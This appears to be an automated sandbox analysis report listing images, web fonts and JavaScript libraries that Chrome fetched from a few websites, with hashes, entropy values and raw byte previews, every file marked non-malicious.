                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..}......ndp............~..............|..u........|..x..........u.........p..e........e............\.....j..k..................cZe......|t~...............l.rV......T....[.<....IDATh.X.B.Z....@A...{..Q.G.Y.s.........A...b.c.l.......>.m.F..h........./t..1....n..=...h.L.....6&....B.jm.V .....kG..+....dr.Jy<<T `#@Z.....h.......Z.<...;5.....V.....&.N.........x....3.... ....3.7..'..?..J....d}..E..y....3.._.....fa8.R .....g.c.ecY.fY.f.YQ8a.Z?..e.J.w...'..p.6.9...s...e.g.$n..i.....-...U.c....m...`...+,`.EG..tQ.....}fE...Q_....|. ,&^......%^...C..$...............K..R........ .p...;..K../V..$I..3g.2a.R1y.P8,#4.wq..%&5.....w=..ZLp....D-...t.?eP#.].v.$&..q...........v...m...H3v.[8.k L..+.,.=.1.....u4..F...e..me6...%H-..K.W.A..8.f.z..l..Q.....D..VU..L.}8L&...e.....6....x....s.J.Zn../3......,*..a ,6u....v..CVKD..b]aR......g^..7.D..:L..4G...u1/..$...u..K}K|.,....@.K3. x.5......S.%..19.l.H..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5866
                                              Entropy (8bit):7.960716266838465
                                              Encrypted:false
                                              SSDEEP:96:VMjYPtCTvp4gQn/sVdc+ilLo9P67vdy5G0o2/BolszmSL4u5XBy5w1YwqScC:9sTp/qsVO+im9Uc5GrWolnSMujy5w1tb
                                              MD5:F7EFDBBEC224B88B48DB0EAD14CB9BCA
                                              SHA1:921038A262EDE3C6023B10D2B3BECF4A3B47E530
                                              SHA-256:AFBF99FA9BA07134B16EE2F0EE72E16AFF365B4C2F4225F2E11755EF6952FB50
                                              SHA-512:6163FA38C4379EC9C3503584B173CDB62E8B2EFD62CE89C265BECDD7CAF2748DB736C2FD86857D019068F815A0F5701940194E3386FF906CB390AA9D3842D1E7
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.T'SE.................}g...TF.QA.QC.MD....WI.!.}..........~mWH..xa.xW..B..E.U(...$...S.UF..R'.X4L>.............MI...H....R-..EKF........M..3nJ.OC...<J>..}dXC.yW..{j..>ZA..~b..|\N........N+.R......o..........o..nX?...x......JK.WF.....SV...]S......g....kJa>.....zs._fI@.OI.E:....Lj..Z......UJ...2.kU....mX........s.........YB..r\.......T.ZN.dJ..........F>......O..l .........L%...QM....{.....f[....D8...{.....R......T=.l`............G...x.SJ.....@..a..|.Z"k]...7.qlO;...-...D....s......un.y....{..l..I.....i.......d/...t........rL5..h.......{M........R........f....B..7..]....dA{..o..S....f............yQe..ykRt..tV............g....]..}}.vT..E..HV.m........g........px.m.....RBv.{..co..hoi?IL.=.\..;.tB.o.L..[7+z...(.jm..[..W...t....rGA..a.f.Z....IDATh..}H.i..'.......D.&.hL}..61h..e5..M.&..Q.d.b...P]=m0T]|..i.@=.x.-TK..-k..X....v.n....._..?..{&..5.}.<Of2.|...<.......n.Ir~.$.{.J....a...LT(..F...}.w.U.l...P*....q..p.a.>."...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11777
                                              Entropy (8bit):7.5521435237074375
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwH5+NH4/l24SzSM4131MzEXYC8nTaJY7UoS5CMkAul:4YNg7ZRpjM4p2g9gTw1Tm
                                              MD5:C9E43841470571F45698123AB271FB11
                                              SHA1:FC0972F8CDB1AA5CF597BC428907A07A60CA767F
                                              SHA-256:5B43E833C948ED90DEBF68D63BF8F5FD6653D85EF463CEF7530EF2474C58AD62
                                              SHA-512:1DE56FD08F55719591BF98D756B316621BCD6FA38BCB205FE850A2135B2CF07F842C48D5A07D4BDA359BEE2C11146C5CBAFC60A73932FA7BF2E7ABA89EFE1EE0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/51/f1e0b3d659fc92bdec84a0c6e178303c.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15101
                                              Entropy (8bit):7.621391892961889
                                              Encrypted:false
                                              SSDEEP:384:BeFm4j+ccC2dloVS076M7cKYQpBlVctgxgFE8:KmX8E0mOcipzVctg98
                                              MD5:B2926BFD8C547A041B2BD1E950A49ED3
                                              SHA1:C7C9E8472F1E46242029A7E38FA16AA4C4E7D66D
                                              SHA-256:3ED6294A328E11091708F2C9D1C97D629634DB61549394E96A0BC9515BDB474F
                                              SHA-512:5F5CF0B5515E0876A864BE17B767F3209313F774799FED43D0BF0F0E66C97869971847087B6183F7C4D045454AD2383F0159625D64272A277D2A297E755152F0
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:14149B18933E11ED8364C939D7A12684" xmpMM:DocumentID="xmp.did:14149B19933E11ED8364C939D7A12684"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:14149B16933E11ED8364C939D7A12684" stRef:documentID="xmp.did:14149B17933E11ED8364C939D7A12684"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................... ...-...:.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                              Category:downloaded
                                              Size (bytes):15344
                                              Entropy (8bit):7.984625225844861
                                              Encrypted:false
                                              SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                              MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                              SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                              SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                              SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                              Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):31821
                                              Entropy (8bit):7.895027904829223
                                              Encrypted:false
                                              SSDEEP:384:xUKr0cHH93k+yYZDK+FHzjS3M03KAkP07EvGDdzo/o7nMZhH5gDkJ301fweNugAJ:mMdH93k4knKq3WozM2DkJg4qo
                                              MD5:1C963B81E8B51DF4D3792D970765B40F
                                              SHA1:A1229488D0C7781E4A1E8B1D9BC1E28ECCB699A7
                                              SHA-256:407B907E4A18358C9861C93A8B1FDCF68E308887F49AFCFC53C60D6B0EC25A2C
                                              SHA-512:E0101F4FF6635ACE7A096CFE8D6DA869B0F3C40557A624A774ACB246E724A3AD2ECF2132B803E3C58C91F8613714BB1A627C96A6E4B9239F093024F3BAA127D1
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:2574861A925F11EDAD33D32BDDFEE87E" xmpMM:DocumentID="xmp.did:2574861B925F11EDAD33D32BDDFEE87E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:25748618925F11EDAD33D32BDDFEE87E" stRef:documentID="xmp.did:25748619925F11EDAD33D32BDDFEE87E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................R..@o..Yi..|K................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 4568, version 770.768
                                              Category:downloaded
                                              Size (bytes):4568
                                              Entropy (8bit):7.942692165035656
                                              Encrypted:false
                                              SSDEEP:96:VVaWVGIZCk9z8M6eJ3GhqVnS99x1gKdkiOu+V2fkCwX7iaNl4hMh/zKfn:VQWxL8M6ewhgSBSqOu5f6vQ6JzCn
                                              MD5:6DDAF31A1E0E05490F6919CBB3347E9D
                                              SHA1:DD7E4A76DE26E9E39168DFAC3FBB8A34A87B76BC
                                              SHA-256:F46715C9D30047F8DEA4EB25ED869F791EB069C6B0F6102382C32A56AEEADFBB
                                              SHA-512:1D88AE2861EC07B2F03261FB6582F1928EA56D28CA3CD9576F5FDA6E69C613486BD08E5C4F3A4946CDEE1E2699B14AE1B8C788EDA4889C295F5A062A82E9A37B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/webfonts/fa-v4compatibility.woff2
                                              Preview:wOF2..............$d.............................8.$. .`.......`.P.... .1..U......p.~?...5.....4.zw-K....p,.......b...9......u.u9b..e[...e.F.IV@....Y.Y.:..G..%^.|.............._....F.p./.K.....7+.K.Ag.G.....j...F.i+.q.U....fd...LN.F...{). @.T.....Ry..P#...z.x.[...7...K.0aH.....q.@...B..Q..W.C.(~.F^.....0..$.....g{.&...........s.<...Q..G<.P.u..\...@........nD$..PuB...v...%..+.<^...M.`[......`.6.%..@.*...k@.M.8."....Q...............2...[.....e....v.}......d...+...~..[.L.r.x.0<j.6.j...NV.....Wl..M.R.X~\>!........6....\..d*.xE.N.$^...?.?.?._....v.".B..&..q..,....."......k........y:g.+.."I..Q)8.\`Q.St.....sAz......K...dX.......c'=...ch?...c...8..;`?....>R.j.(...Vu.s..Tgy..*T.Q.....d..gd.!.[Z7-!..f..X.7..n{1_Y90...++.b._}.5.uT..o.%.,.0...\,..Pu....T"..-..,.u..2..;...Nu.....W1.-.`.(..^7..De9.U...........c?.8...8V!L3....n.y..>...3Q..9/\..~.p&..q.B.f....]x" .._..;..>..*... .3...N.,.$..ey..<ka(Q..2<o#$(.....H.su.Rws#$(DG....bI....>W......8r..5)P..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text
                                              Category:downloaded
                                              Size (bytes):7588
                                              Entropy (8bit):4.127023876378625
                                              Encrypted:false
                                              SSDEEP:192:N7QiX2/qCHgkUFleNRAs74YNNvNesi6gI6mzb2kfnZVEC1V0o4f:Nct/UkUFwNRx8YNNvNesi6gI6mzb2kf8
                                              MD5:487A74CEEC3353507E3FB7DDB10858C8
                                              SHA1:C7A7E4DE2173F6C5B8F5C68A422FEB861C3148B9
                                              SHA-256:BF054380A7F7D46B487C00AE0EF5C51D96C6176A14AC44797BBDC9FF152CA64D
                                              SHA-512:97972485F451003A42DC1940C215934FCD49AF77040D6E3DD7B7B21860EDDB635A1CFA78E4B40DBB61FCDFB4632DBC0012E0C8F3938FDC75C0C79FE1DFA7C9C1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/jquery.meanmenu.min.js
                                              Preview:!function($) {. "use strict";. $.fn.meanmenu = function(e) {. var n = {. meanMenuTarget: jQuery(this),. meanMenuContainer: "body",. meanMenuClose: "X",. meanMenuCloseSize: "18px",. meanMenuOpen: "<span /><span /><span />",. meanRevealPosition: "right",. meanRevealPositionDistance: "0",. meanRevealColour: "",. meanScreenWidth: "480",. meanNavPush: "",. meanShowChildren: !0,. meanExpandableChildren: !0,. meanExpand: "+",. meanContract: "-",. meanRemoveAttrs: !1,. onePage: !1,. meanDisplay: "block",. removeElements: "". };. e = $.extend(n, e);. var a = window.innerWidth || document.documentElement.clientWidth;. return this.each(function() {. var n = e.meanMenuTarget. , t = e.meanMenuContainer. , r = e.meanMenuClose.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14084
                                              Entropy (8bit):7.64756924338399
                                              Encrypted:false
                                              SSDEEP:384:4YNg7esKs583x5L6HItWXtIVG7JZqdGku3K:4Yy6sy3x5+ocXtgTX
                                              MD5:66126F5CAED4A79198979ABBCAD7D39A
                                              SHA1:256457549966445B841BA02C02B6EE32D9B84625
                                              SHA-256:41DD027DB271C5E0597E77A738E888D69280C64E36D75931B693D733CBDA0FB1
                                              SHA-512:37D588F12BBC219AE496D0FFEB830BC7DCCAAA7D92AD794A7B9E1992385F21F2EEA507CAD984E55E4DAF7D9045C149BCB0C4175DD2F35541F87C5D7D8FA941AB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/53/27a2e8f36ba1db5a0eebc6278979eb96.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (543)
                                              Category:dropped
                                              Size (bytes):120870
                                              Entropy (8bit):5.457739714604933
                                              Encrypted:false
                                              SSDEEP:3072:Z8IHJFmdKFYJb5AChWTa8sr+1AZ1OiE3uprmY0HO0:eSHmdKF6b5AChWG8sr+1AZ1OiE3uprmH
                                              MD5:623A3FAEBCF826AF96A9411065A3D6DA
                                              SHA1:3AD6D7E756ED4456F8A9119D8F34AB1AA5ADE70B
                                              SHA-256:811B5FBB77A4AF9DCE1AFAA7975907EB27884AED3A7E904338E652DF263DD3BD
                                              SHA-512:1B47A25CE33BED6C58FF8889D780B0A24B08FFAF4E1975F311CDFFF2E397465546A134326130501236A08E8D68419B55BEF5895EB08934E803841A1436372C95
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(g){var window=this;'use strict';var d7=function(a){g.xk(a,"zx",Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^g.Ya()).toString(36));return a},e7=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.iha(a.D,b,c)},Erb=function(a){if(a instanceof g.jn)return a;.if(typeof a.Hm=="function")return a.Hm(!1);if(g.Ra(a)){var b=0,c=new g.jn;c.next=function(){for(;;){if(b>=a.length)return g.p1;if(b in a)return g.kn(a[b++]);b++}};.return c}throw Error("Not implemented");},Frb=function(a,b,c){if(g.Ra(a))g.kc(a,b,c);.else for(a=Erb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},Grb=function(a,b){var c=[];.Frb(b,function(d){try{var e=g.Jp.prototype.B.call(this,d,!0)}catch(f){if(f=="Storage: Invalid value was encountered")return;throw f;}e===void 0?c.push(d):g.mma(e)&&c.push(d)},a);.return c},Hrb=function(a,b){Grb(a,b).forEach(function(c){g.Jp.prototype.remove.call(this,c)},a)},Irb=function(a){if(a.oa){if(a.oa.locationOverri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6170
                                              Entropy (8bit):7.964666159336286
                                              Encrypted:false
                                              SSDEEP:192:E7D5oqG22OwH7xKfriNSCfbSGBvjohK7vtPUYiy:qDu2wH7sfeYabSGBvjohqlPUw
                                              MD5:5A4A2CBD5E2F05B759687D15494CB63F
                                              SHA1:E6C6CD0C36D809ECE9DBCC5D0EAB207396909EDA
                                              SHA-256:216F9CE02C8F87BC794AB1E88D1AAA614F42BB34DEAF82F8956D8C1D4CF5E6EC
                                              SHA-512:1DAAEED8AB5351A464834CF864C2DB4DCA83D84ED6B5DACD63DE4E265EEE12D4C6AF31E1E37B6BBA3A6419713AC77A8D7CFB42A00CD6114D7C42361AF1A5DB95
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/accessability.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......V..A..N..M..J..F.....J..D..S..H..X..?.....P..V..Y..B.....O.....<|.......[...........H...........I..O.....E..L..N........a.....7z.J.....]..U.....T...........W.....U..:..H..T..:..O.....@.....S........E..F..5w.e..F}...]..+_....&K....U...l.H..u..Q.....?..R..b....>..0h....;r........k..|.....c...........3n..w.....:..O..B.._..R..Z..D....Ce.W..s....I..K..]..7y....i..\..&V....n....1l....I..Y....1W.Z..y..Yx.B{....H.....r..Z......f$.....IDATh.Vm..X.6. b+...4X..CbZ....L.C(i".F..7qS....K..&P[d............NW/[.1/....s.s..r......$.X.......L...jY`..I..d.#.....[c.6.D..<r0.r....@%.7.\....p8.......,.w.\J.....c5..6.<..;c..Kp.j'.....,.......sC......*.d1..X.9E.g....2..7..r}...:.<.0.g......K..E..<.@.r.Zov{}>.tL3.....\0...Ob.$b..Vz...|HV..`..7s.q...\.ey8..c7...\4..f..%......T..rs...3.......0P..z..@...^.UH.H.t.......U.k.. ..(Z.6.n.....UbwV.A.7.W.f..-a...l...(....^@".y2d-.....!Fc.0..-WY.SZV.o.)....~...,xJ.`..$e.P9..I.j.n..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3391)
                                              Category:downloaded
                                              Size (bytes):68468
                                              Entropy (8bit):5.596561528703444
                                              Encrypted:false
                                              SSDEEP:768:PSx+1QK2AEU2jEWW1ntD9uVXH4iwnaUbO/2FoXaMLQs3oTe6:a9EfhM/2+6
                                              MD5:289D38403C42D3163E3F636616C60030
                                              SHA1:ECAAC0127527CAB74B4F9207D46F56BE1934080F
                                              SHA-256:8A8292CFCF858648408B62D80C7FE57BA6558CC223B846989077A4D5DAD61DC9
                                              SHA-512:17ECA90CFAFEBC2B560AB9BE9CDEA4980C46E3723E78C53A81058654E6028D98117A1DAA3458E1C1B0F5AA6C64FEF2968F8AFEAD879699A4269BCEF5B40574E3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/embed.js
                                              Preview:(function(g){var window=this;/*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/.'use strict';var Ehb=function(a){a.mutedAutoplay=!1;a.endSeconds=NaN;a.limitedPlaybackDurationInSeconds=NaN;g.AQ(a)},Fhb=function(a){g.Po(a);.for(var b=0;b<a.eg.length;b++){var c=a.eg[b],d=a.Sy[b];if(d!==c.version)return!0;if(!g.No(c)||c.Om)if(c.Om||c.r_!==g.So)(c.O1(c)||Fhb(c))&&c.P1(c),c.Om=!1,c.r_=g.So;if(d!==c.version)return!0}return!1},b4=function(a){var b=g.Lo(a);.a={};return a[Symbol.dispose]=function(){g.Lo(b)},a},Ghb=function(){return{I:"svg",.X:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},V:[{I:"path",Fc:!0,S:"ytp-svg-fill",X:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5740
                                              Entropy (8bit):7.861649808886073
                                              Encrypted:false
                                              SSDEEP:96:SllcHitlIxv9vk7C1+I4wWHLihk/xo9ydQB/BloZZZZCXXw9yzXTDCeugj:ZIIHUCD4waSk9hPa
                                              MD5:67CA02552FFD5B3BDA9A1ACA7E285324
                                              SHA1:0161CE177F8F6058A621B1D9447211359544E877
                                              SHA-256:9F74A4CA9F5C808B7E0F8639A80218F303446B719B5F33B8410F6E6E2AAD9381
                                              SHA-512:FB15D1F7C25B54164BD10C60210F33EEED097D37A8F5AEBC8FF217D2063388BE7FFEFF85B46F35C5648283C54874EAC44583FA4A639974BF0AD1A9458D9C3ED9
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (8099)
                                              Category:downloaded
                                              Size (bytes):8156
                                              Entropy (8bit):5.200876657858407
                                              Encrypted:false
                                              SSDEEP:192:tmEE6yAmu6qUxbU5C9nrr1GkEPIAeJ3KO4poIJ:EEE/Amu6qUxVBxGkAI///IJ
                                              MD5:3F3D63E2FEEA51DA5EA907E80E74D75D
                                              SHA1:CA546EF8E982C4B9D1AD43AD38FC702D0CB1D873
                                              SHA-256:1041568A299093EF168FD78F8B54C27D1CF0CDFAE8E870DE0769BA1174C6BC05
                                              SHA-512:20D9A51AC9B5EC340C4B9A5053FC35CF0C1E29514D8AA41D7F45F0F13270F64416F9652EFE7AAE63B0BEF7BD4637F5D56667A8AFF8AC0D61F88BB50FAB0B40B3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/wow.js
                                              Preview:/*! WOW wow.js - v1.3.0 - 2016-10-04.* https://wowjs.uk.* Copyright (c) 2016 Thomas Grainger; Licensed MIT */!function(a,b){if("function"==typeof define&&define.amd)define(["module","exports"],b);else if("undefined"!=typeof exports)b(module,exports);else{var c={exports:{}};b(c,c.exports),a.WOW=c.exports}}(this,function(a,b){"use strict";function c(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function d(a,b){return b.indexOf(a)>=0}function e(a,b){for(var c in b)if(null==a[c]){var d=b[c];a[c]=d}return a}function f(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)}function g(a){var b=arguments.length<=1||void 0===arguments[1]?!1:arguments[1],c=arguments.length<=2||void 0===arguments[2]?!1:arguments[2],d=arguments.length<=3||void 0===arguments[3]?null:arguments[3],e=void 0;return null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.crea
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6775
                                              Entropy (8bit):7.9410302413002904
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSH5i9mi9HNY1Z+tK+6NEHw45bJdkpoKy/2:UIIHUCD4wa3S11ZAt34oKy/LNivM/M
                                              MD5:4F201692F69A53D8C568BA3AE8EAB67F
                                              SHA1:52ED236129DF6CBEC52C7954A04112C49C79C3FC
                                              SHA-256:CEABC6C2A1F5B3F50CD568401B37AC7567DB9F09876D5A0786EFA7CA99C1028C
                                              SHA-512:5B973E043AE3041969DC45D1CC13727FD4552CAFD265EF8D337365D2415A5BCF6745A340C0CC38A7A1F0457511FD4B3329D62D147E6CC85EDA547A57EA64E062
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11777
                                              Entropy (8bit):7.5521435237074375
                                              Encrypted:false
